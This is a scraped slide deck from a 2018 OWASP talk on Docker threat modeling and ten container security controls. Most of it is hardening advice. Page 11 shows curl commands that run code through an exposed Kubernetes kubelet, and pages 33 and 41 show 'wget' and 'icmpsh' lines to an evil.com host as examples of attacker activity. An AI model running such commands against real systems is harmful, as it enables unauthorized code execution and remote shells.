• Home

  • Documents

  • Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker...
52
Docker Threat Modeling and Top 10 Dr. Dirk Wetter @drwetter

Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

  • Upload
    others

  • View
    8

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

Docker Threat Modeling and Top 10

Dr. Dirk Wetter@drwetter

https://twitter.com/drwetter
Page 2: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

about:meabout:me

Independent Consultant Information Security(self-employed)

OWASP

● Organized + chaired AppSec Europe 2013 in Hamburg

● Involved in few following conferences

● Former German Chapter Lead, etc

● 20+ years paid profession in infosec

● System, network + application security

● Pentests, consulting, training

● Information security managementOpen Source

● Longtime smaller contributions

● TLS-Checker testssl.sh

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://testssl.sh/
Page 3: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Hyped + new?

(yawn)

– Linux: Docker 2013 (March)– FreeBSD: Jails 2000– Solaris: Zones / Containers 2004

https://pxhere.com/en/photo/879460

0. History 0. History

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 4: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Technology: Security advantages– Most per default

– Some need a configuration● Use them!

● Usage: Security concerns– New attack surfaces

● Second line of defense

– Not KISS

– Change of standard processes

Technology and real life Technology and real life

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 5: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

New buzzword:New buzzword: Full Spectrum Engineer Full Spectrum Engineer

Now a developer must become fluent in software testing, deployment, telemetry and even security. Developers will be responsible for securing their own work!

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 6: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

● Answer– don’t do this!

Page 7: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threats to my

containers?

Enumerate!

Threat modeling Threat modeling

https://imgur.com/gallery/ZdEQDwh

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 8: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 1st vector:

Application escape

Threat modeling / 1 Threat modeling / 1

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 9: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 2nd Target:

Orchestration tool

CC-SA 3.0 by Monika Rittershaus , see https://fr.wikipedia.org/wiki/Fichier:Rattle_BPH-Rittershaus2-_Wikipedia.jpg

Threat modeling / 2 Threat modeling / 2

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 10: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– Target: Orchestration tool– Houston: we almost everybody has a problem

● Open management interfaces– CoreOS, etcd

● tcp/2379– Kubernetes

● Insecure kubelet @ tcp/10250 (HTTPS) + 10255 (HTTP)● sometimes not secured etcd @ tcp/2379● dashboard @ tcp/9090 (not installed per default)

– OpenShift– ….

Threat modeling / 2 Threat modeling / 2

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 11: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

# Lists systemscurl -sk https://$IP:10250/pods | jq .

# Code EXECcurl -sk https://$IP:10250/exec|run/<ns>/<pod>/<container>/ -d "cmd=ls /"

Threat modeling / 2 Threat modeling / 2

Link

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
Page 12: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– Target: Orchestration tool

● Research: Exposed orchestration tools (Lacework: PDF)

Threat modeling / 2 Threat modeling / 2

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://info.lacework.com/hubfs/Containers%20At-Risk_%20A%20Review%20of%2021,000%20Cloud%20Environments.pdf
Page 13: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

201 Security

Page 14: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 3nd vector: Other Containers

– Think:● The dear neighbors

Threat modeling / 3 Threat modeling / 3

https://www.realtor.com/news/trends/how-to-handle-terrible-neighbors/

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 15: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 4th vector: Platform/Host

– Think:● What’s wrong w

my foundation??

Threat modeling / 4 Threat modeling / 4

https://news.sky.com/story/hotel-in-taiwan-collapses-after-64-magnitude-earthquake-11239117

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 16: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 4th vector: Platform/host– Special point:

Threat modeling / 4 Threat modeling / 4

(And friends)

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 17: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 5th vector: Network

– Not properly secured local network● From the internet● From the LAN

Threat modeling / 5 Threat modeling / 5

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 18: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Threat Modeling– 6th vector: Integrity and

confidentiality of OS images

Threat modeling / 6 Threat modeling / 6

Trust

http://www.canalj.fr/Zoom/Cine/Moi-Moche-et-Mechant-2/Details/Personnages/Les-Minions

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 19: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Good posture

http://www.xinhuanet.com/english/2018-03/21/c_137053672_3.htm / http://gcaptain.com/big-mess-at-port-of-karachi-after-two-container-ships-collide/ Hassan Jan

Threat modeling Threat modeling

● Not so good postureincl. chances to mess up things

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 20: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

Based on this: make it sosafe

Threat modeling Threat modeling

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 21: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Idea: ~Top 10 Docker Security– Rather security controls than risks– home work + beyond

– Simplified examples + syntax● Only docker cmdline / Dockerfile ● No

– Kubernetes, ...– YAML

Docker SecurityDocker Security

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 22: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 1: User Mapping – Docker’s insecure default!

● Running code as privileged user

Top 1/10 Top 1/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 23: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 1: User Mapping (cont‘d)

Top 1/10 Top 1/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 24: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 1: User Mapping (cont‘d)

Top 1/10 Top 1/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 25: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 1: User Mapping (cont‘d)– Workaround: Remap user namespaces !

– user_namespaces(7)– https://docs.docker.com/engine/security/userns-remap/#enable-userns-re

map-on-the-daemon● Nutshell:

– Configure ● mapping in /etc/subuid + /etc/subgid● /etc/docker/daemon.json

– Start dockerd with --userns-remap <mapping>● Limits:

– Global to dockerd– PID / net ns

Top 1/10 Top 1/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://docs.docker.com/engine/security/userns-remap/#enable-userns-remap-on-the-daemon
https://docs.docker.com/engine/security/userns-remap/#enable-userns-remap-on-the-daemon
Page 26: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 1: User Mapping (cont‘d)– Never-ever as Root

● Violation of Least Privilege Principle– Giving away benefit of „containment“– Escape from application => root in container

● No need to do this – Also not of low (<= 1024) ports

Top 1/10 Top 1/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 27: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 2: Patchmanagement– Host

– Container Orchestration

– Images

Top 2/10 Top 2/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 28: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 2: Patchmanagement– Host

● Window for privilege escalation!

Top 2/10 Top 2/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 29: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 2: Patchmanagement

– Container Orchestration● Don’t forget to patch the management if needed ;-)

Top 2/10 Top 2/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 30: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 2: Patchmanagement

– Images

Top 2/10 Top 2/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 31: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 3: Network separation + firewalling– Basic DMZ techniques

● Internal● (External)

Top 3/10 Top 3/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 32: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 3: Network separation + firewalling

– Internal (network policies)– Depends on

● Network driver ● Configuration

1) Allow what’s needed2) deny ip any any log | iptables -t <table> -P DROP

Top 3/10 Top 3/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 33: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 3: Network separation + firewalling

– External (to BBI)● Do not allow initiating outgoing

TCP connections● UDP / ICMP: same

% wget http://evil.com/exploit_dl.sh % icmpsh -t evil.com

Top 3/10 Top 3/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 34: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 4: Maintain security contexts– No Mix Prod / Dev– No Random Code (docker run <somearbitraryimage>)– Do not mix

● front end / back end services

– CaaS● Tenants

Top 4/10 Top 4/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 35: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 5: Secrets Management– Whereto: Keys, certificates, credentials, etc ???

● Image ?? ● Env variables?

– docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image

● Kubernetes + YAML secrets: be careful● Mounts / volumes

– docker run –v /hostdir:/containerdir image● export S_FILE=./secretsfile.txt && <…> && rm $0

● key/value store– KeyWhiz, crypt, vault

● Mozilla SOPS?

Top 5/10 Top 5/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://github.com/mozilla/sops
Page 36: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 6: Resource protection– Resource Limits (cgroups)

● --memory= ● --memory-swap=

● --cpu-*--cpu-shares=<percent>

– Also: --pids-limit XX

Top 6/10 Top 6/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 37: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 6: Resource protection– Mounts!

● If not necessary: Don’t do it● If really necessary + possible: r/o● If r/w needed: limit writes (FS DoS)

Top 6/10 Top 6/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 38: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 7: Image Integrity (and origin)– Basic trust issue

● Running arbitrary code from somewhere?

– Image pipeline● No writable shares ● Proper: Privilege / ACL management

Top 7/10 Top 7/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 39: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 7: Image Integrity (and origin)– Docker content trust

Top 7/10 Top 7/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 40: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 7: Image Integrity (and origin)– Docker content trust– https://docs.docker.com/notary/getting_started/

Top 7/10 Top 7/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://docs.docker.com/notary/getting_started/
Page 41: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 8: Follow Immutable Paradigm

– Least Privilege ● docker run --read-only ...● docker run –v /hostdir:/containerdir:ro

– Attacker ● wget http://evil.com/exploit_dl.sh● apt-get install / apk add

– Limits: Container really needs to write● Upload of files ● R/w host mounts

Top 8/10 Top 8/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 42: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 9: Hardening– Three domains

● Container hardening● Host hardening● (Orchestration tool)

Top 9/10 Top 9/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 43: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 9: Hardening: container– Choice of OS

● Alpine, Ubuntu Core?, CoreOS?

– SUID (SGID)

--security-opt=no-new-privileges– Linux Capabilities

--cap-drop– Seccomp (chrome)

--security-opt seccomp=yourprofile.json

Top 9/10 Top 9/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 44: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 9: Hardening: Host– Networking

● Only SSH + NTP– allow only from defined internal IPs – deny ip any any

– System● A standard Debian / Ubuntu … is a standard Debian / Ubuntu

– Custom hardening● Specialized container OS● SELinux: some advantages● PaX / grsecurity

Top 9/10 Top 9/10

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 45: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Top 10: Logging– Tear down container: logs lost

– Remote logging● Container

– Application– Any system server in container (Web, Appl., DB, etc.)– (Container)

● Orchestration ● Host

– Plus: Linux auditing (syscalls)

Top 10/10 Top 10/10

● Docker-run(1): -v /dev/log:/dev/log

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 46: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● DIY– CIS benchmarks (https://learn.cisecurity.org/benchmarks)

● Docker– https://github.com/docker/docker-bench-security

● Kubernetes – https://github.com/neuvector/kubernetes-cis-benchmark/ (age)– https://kubesec.io

Do it yourselfDo it yourself

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://learn.cisecurity.org/benchmarks
https://github.com/docker/docker-bench-security
https://github.com/neuvector/kubernetes-cis-benchmark/
https://kubesec.io/
Page 47: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts
Page 48: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts
Page 49: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts
Page 50: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

● Bottom Line Security– Dan Walsh: ”Think about what you‘re doing“

– Do: ● Proper planning + design incl. security!

● Build security in!

Bottom LineBottom Line

https://creativecommons.org/licenses/by-nc-sa/4.0/
Page 51: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

OWASP Belgium Chapter Meeting, 17.7.2018 © Dirk Wetter CC 4.0 BY-NC-SA

about:end

3957 C9AE ECE1 D0A7 4569 EE60 B905 3A4A 58F5 4F17

@drwetter

Thank you!

Dr. Dirk Wetter

https://creativecommons.org/licenses/by-nc-sa/4.0/
https://twitter.com/drwetter
Page 52: Docker Threat Modeling and Top 10 - OWASP · – docker run -e SECRET=myprrecious image – docker run –env-file ./secretsfile.txt image Kubernetes + YAML secrets: be careful Mounts

Introductory picture: CC0, https://pxhere.com/de/photo/990309Head picture: CC-BY-SA 3.0 by “Hullie” https://commons.wikimedia.org/wiki/File:Brussel_grote_markt_360.jpg


Patterns & Antipatterns in Docker Image Lifecycle

Patterns & Antipatterns in Docker Image Lifecycle

Software
Run whatever on Hercules with Docker and Singularityalex88ridolfi.altervista.org/pulsar_tutorials_material/Sep26_How_to... · Run whatever on Hercules with Docker and Singularity

Run whatever on Hercules with Docker and Singularityalex88ridolfi.altervista.org/pulsar_tutorials_material/Sep26_How_to... · Run whatever on Hercules with Docker and Singularity

Documents
Docker stack to run your deck

Docker stack to run your deck

Software
Easier Development and Deployment @bhosmer - @ron williams fo… · Easier Development and Deployment! ... $ docker build! $ docker run! $ docker start! $ docker stop! $ docker logs!

Easier Development and Deployment @bhosmer - @ron williams fo… · Easier Development and Deployment! ... $ docker build! $ docker run! $ docker start! $ docker stop! $ docker logs!

Documents
Docker - Beginner Biologist 1 · run: Docker will run the following named item: a Docker image. hello-world: name of a Docker image with informations to run a version of the “Hello

Docker - Beginner Biologist 1 · run: Docker will run the following named item: a Docker image. hello-world: name of a Docker image with informations to run a version of the “Hello

Documents
Containers and Security Serverless Applications, · How a container is born Dockerfile Docker Image Docker Containers builds a generates Dockerfile FROM ubuntu:14.04 RUN apt-get update

Containers and Security Serverless Applications, · How a container is born Dockerfile Docker Image Docker Containers builds a generates Dockerfile FROM ubuntu:14.04 RUN apt-get update

Documents
ASP.NET 5 + Docker + Azuregotocon.com/.../slides/StuartLeeks_ASPNET5DockerAzure.pdf · 2015. 10. 7. · Azure + Docker VM image: Ubuntu with docker Docker VM Extension Docker Compose

ASP.NET 5 + Docker + Azuregotocon.com/.../slides/StuartLeeks_ASPNET5DockerAzure.pdf · 2015. 10. 7. · Azure + Docker VM image: Ubuntu with docker Docker VM Extension Docker Compose

Documents
How To Run Splunk As A Docker Image?

How To Run Splunk As A Docker Image?

Documents
Container as a Service on GPU Cloud: Our Decision among ... · Wrap docker run and docker create commands e.g. $ nvidia-docker run --rm nvidia/cuda nvidia-smi Add docker cli options

Container as a Service on GPU Cloud: Our Decision among ... · Wrap docker run and docker create commands e.g. $ nvidia-docker run --rm nvidia/cuda nvidia-smi Add docker cli options

Documents
Host Health Monitoring with Docker Run

Host Health Monitoring with Docker Run

Software
docker run docker service is the new · Getting Started with Docker Clustering Mike Goelzer / mgoelzer@docker.com / @mgoelzer Docker Inc. docker service is the new docker run docker

docker run docker service is the new · Getting Started with Docker Clustering Mike Goelzer / [email protected] / @mgoelzer Docker Inc. docker service is the new docker run docker

Documents
Containers - docs.freitagsrunde.org · Docker Client docker build Build an image from a Dockerfile docker exec Run a command in a running container docker inspect Return low-level

Containers - docs.freitagsrunde.org · Docker Client docker build Build an image from a Dockerfile docker exec Run a command in a running container docker inspect Return low-level

Documents
Nanopolish Documentation nanopolish git checkout v0.7.1 make 1.4To run using docker First build the image from the dockerfile: docker build. Note the uuid given upon successful build

Nanopolish Documentation nanopolish git checkout v0.7.1 make 1.4To run using docker First build the image from the dockerfile: docker build. Note the uuid given upon successful build

Documents
2007-02-03...docker run --rm hello-world 11 dockerd docker Docker Hub hello-world:latest a7e0c3bf2de8 (hello-world)

2007-02-03...docker run --rm hello-world 11 dockerd docker Docker Hub hello-world:latest a7e0c3bf2de8 (hello-world)

Documents
Docker, Ansible and practical experiences....Ansible and Docker • Two relevant modules for Ansible 2.0.x • “docker_image” to build an image • “docker” to run a container

Docker, Ansible and practical experiences....Ansible and Docker • Two relevant modules for Ansible 2.0.x • “docker_image” to build an image • “docker” to run a container

Documents
Docker for the UseR - Microsoft · docker pull [user/repo] docker build [directory] -t [tag] docker run [image] -p [ports] -v [volumes] [command] -d docker stop [container] Start

Docker for the UseR - Microsoft · docker pull [user/repo] docker build [directory] -t [tag] docker run [image] -p [ports] -v [volumes] [command] -d docker stop [container] Start

Documents
runC: The little engine that could (run Docker containers) by Docker Captain Phil Estes

runC: The little engine that could (run Docker containers) by Docker Captain Phil Estes

Technology
Docker Containers - sinog.si · Dockerization of applications GITHUB (GitLab) DOCKER BUILD DOCKERHUB (Docker Registry) DOCKER RUN FROM ubuntu RUN apt-get update RUN apt-get -y install

Docker Containers - sinog.si · Dockerization of applications GITHUB (GitLab) DOCKER BUILD DOCKERHUB (Docker Registry) DOCKER RUN FROM ubuntu RUN apt-get update RUN apt-get -y install

Documents
Docker Trickkiste - pretalx · 2019-03-22 · Docker Basics Praktische Kommandos für jeden Tag. docker run Den Container nach dem Beenden löschen docker run --rm alpine.dockerignore

Docker Trickkiste - pretalx · 2019-03-22 · Docker Basics Praktische Kommandos für jeden Tag. docker run Den Container nach dem Beenden löschen docker run --rm alpine.dockerignore

Documents
Microsoft and Docker - files.meetup.com and Docker.pdf · docker.com Docker - Build, Ship, and Run.. New: Docker Orchestration Tools Assemble multi-container apps, run on any infrastructure

Microsoft and Docker - files.meetup.com and Docker.pdf · docker.com Docker - Build, Ship, and Run.. New: Docker Orchestration Tools Assemble multi-container apps, run on any infrastructure

Documents
Docker and HTCondor - mi.infn.itprelz/condor-tutorial/ThainG_Docker.pdf · $ docker run ubuntu cat /etc/debian_version All docker commands are bound into the “docker” executable

